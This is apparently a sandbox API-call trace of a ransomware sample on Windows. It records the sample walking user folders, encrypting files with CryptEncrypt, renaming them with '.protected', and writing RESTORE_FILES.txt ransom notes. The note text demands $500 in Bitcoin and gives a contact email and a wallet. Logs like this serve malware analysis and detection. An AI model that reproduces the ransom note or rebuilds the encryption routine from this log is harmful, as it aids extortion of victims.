HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\f293aead5e84facfb686c4a620718928_c8424a0b24a72939b13720d0c000c9c1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.195] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1") returned 152 [0089.195] StrStrW (lpFirst="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpSrch=".txt") returned 0x0 [0089.195] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1") returned 152 [0089.195] StrStrW (lpFirst="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpSrch=".rar") returned 0x0 [0089.195] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1") returned 152 [0089.195] StrStrW (lpFirst="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpSrch=".zip") returned 0x0 [0089.195] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1a0, lpOverlapped=0x0) returned 1 [0089.196] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.196] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1a0, lpOverlapped=0x0) returned 1 [0089.196] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.196] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.196] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.196] CloseHandle (hObject=0x150) returned 1 [0089.196] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1.protected") returned 162 [0089.196] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\f293aead5e84facfb686c4a620718928_c8424a0b24a72939b13720d0c000c9c1"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\f293aead5e84facfb686c4a620718928_c8424a0b24a72939b13720d0c000c9c1.protected")) returned 1 [0089.197] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.197] lstrcmpiW (lpString1="F90F18257CBB4D84216AC1E1F3BB2C76", lpString2="Windows") returned -1 [0089.197] lstrcmpiW (lpString1="F90F18257CBB4D84216AC1E1F3BB2C76", lpString2="Program Files") returned -1 [0089.197] lstrcmpiW (lpString1="F90F18257CBB4D84216AC1E1F3BB2C76", lpString2="Program Files (x86)") returned -1 [0089.197] lstrcmpiW (lpString1="F90F18257CBB4D84216AC1E1F3BB2C76", lpString2="$Recycle.bin") returned 1 [0089.197] lstrcmpiW (lpString1="F90F18257CBB4D84216AC1E1F3BB2C76", lpString2="System Volume Information") returned -1 [0089.197] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76") returned 119 [0089.197] StrStrIW (lpFirst="F90F18257CBB4D84216AC1E1F3BB2C76", lpSrch=".protected") returned 0x0 [0089.197] lstrcmpW (lpString1="F90F18257CBB4D84216AC1E1F3BB2C76", lpString2="RESTORE_FILES.txt") returned -1 [0089.197] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.197] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.197] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\f90f18257cbb4d84216ac1e1f3bb2c76"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.197] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76") returned 119 [0089.197] StrStrW (lpFirst="F90F18257CBB4D84216AC1E1F3BB2C76", lpSrch=".txt") returned 0x0 [0089.198] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76") returned 119 [0089.198] StrStrW (lpFirst="F90F18257CBB4D84216AC1E1F3BB2C76", lpSrch=".rar") returned 0x0 [0089.198] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76") returned 119 [0089.198] StrStrW (lpFirst="F90F18257CBB4D84216AC1E1F3BB2C76", lpSrch=".zip") returned 0x0 [0089.198] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0xfc, lpOverlapped=0x0) returned 1 [0089.198] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff04, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.198] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0xfc, lpOverlapped=0x0) returned 1 [0089.198] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.198] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.198] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.198] CloseHandle (hObject=0x150) returned 1 [0089.199] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76.protected") returned 129 [0089.199] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\f90f18257cbb4d84216ac1e1f3bb2c76"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\f90f18257cbb4d84216ac1e1f3bb2c76.protected")) returned 1 [0089.199] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0089.199] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0089.199] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\RESTORE_FILES.txt") returned 104 [0089.199] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0089.199] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.200] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0089.200] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.200] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0089.200] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.200] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0089.200] CloseHandle (hObject=0x14c) returned 1 [0089.201] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.201] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.201] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\RESTORE_FILES.txt") returned 95 [0089.201] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.202] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.202] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.202] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.202] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.202] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.202] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0089.203] CloseHandle (hObject=0xd8) returned 1 [0089.203] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.203] lstrcmpiW (lpString1="IME12", lpString2="Windows") returned -1 [0089.203] lstrcmpiW (lpString1="IME12", lpString2="Program Files") returned -1 [0089.203] lstrcmpiW (lpString1="IME12", lpString2="Program Files (x86)") returned -1 [0089.203] lstrcmpiW (lpString1="IME12", lpString2="$Recycle.bin") returned 1 [0089.203] lstrcmpiW (lpString1="IME12", lpString2="System Volume Information") returned -1 [0089.203] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12") returned 66 [0089.203] lstrcmpW (lpString1="IME12", lpString2=".") returned 1 [0089.203] lstrcmpW (lpString1="IME12", lpString2="..") returned 1 [0089.203] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12\\*") returned 68 [0089.203] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.213] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.213] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.213] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.213] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.213] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.213] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12\\.") returned 68 [0089.213] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.213] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.213] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.213] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.213] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.213] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.213] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.213] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12\\..") returned 69 [0089.214] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.214] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.214] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.214] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.214] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12\\RESTORE_FILES.txt") returned 84 [0089.214] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\ime12\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.214] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.214] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.215] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.215] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.215] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.215] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0089.215] CloseHandle (hObject=0xd8) returned 1 [0089.216] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.216] lstrcmpiW (lpString1="IMJP12", lpString2="Windows") returned -1 [0089.216] lstrcmpiW (lpString1="IMJP12", lpString2="Program Files") returned -1 [0089.216] lstrcmpiW (lpString1="IMJP12", lpString2="Program Files (x86)") returned -1 [0089.216] lstrcmpiW (lpString1="IMJP12", lpString2="$Recycle.bin") returned 1 [0089.216] lstrcmpiW (lpString1="IMJP12", lpString2="System Volume Information") returned -1 [0089.216] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12") returned 67 [0089.216] lstrcmpW (lpString1="IMJP12", lpString2=".") returned 1 [0089.216] lstrcmpW (lpString1="IMJP12", lpString2="..") returned 1 [0089.216] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12\\*") returned 69 [0089.216] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.216] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.216] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.216] 